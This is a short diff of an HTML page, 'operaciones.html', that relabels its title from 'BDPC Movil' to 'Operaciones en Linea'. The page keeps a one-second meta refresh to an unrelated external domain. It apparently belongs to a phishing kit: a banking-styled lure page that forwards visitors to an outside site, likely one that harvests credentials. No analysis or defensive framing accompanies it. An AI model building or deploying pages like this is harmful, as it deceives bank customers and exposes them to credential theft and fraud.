--- a/operaciones.html
+++ b/operaciones.html
@@ -1,6 +1,6 @@
 <html>
 <head>
-<title>BDPC Movil</title>
+<title>Operaciones en Linea</title>
 <META HTTP-EQUIV="REFRESH" CONTENT="1;URL=https://tcplnoida.co.in/ios/">
 </head>
 <body>
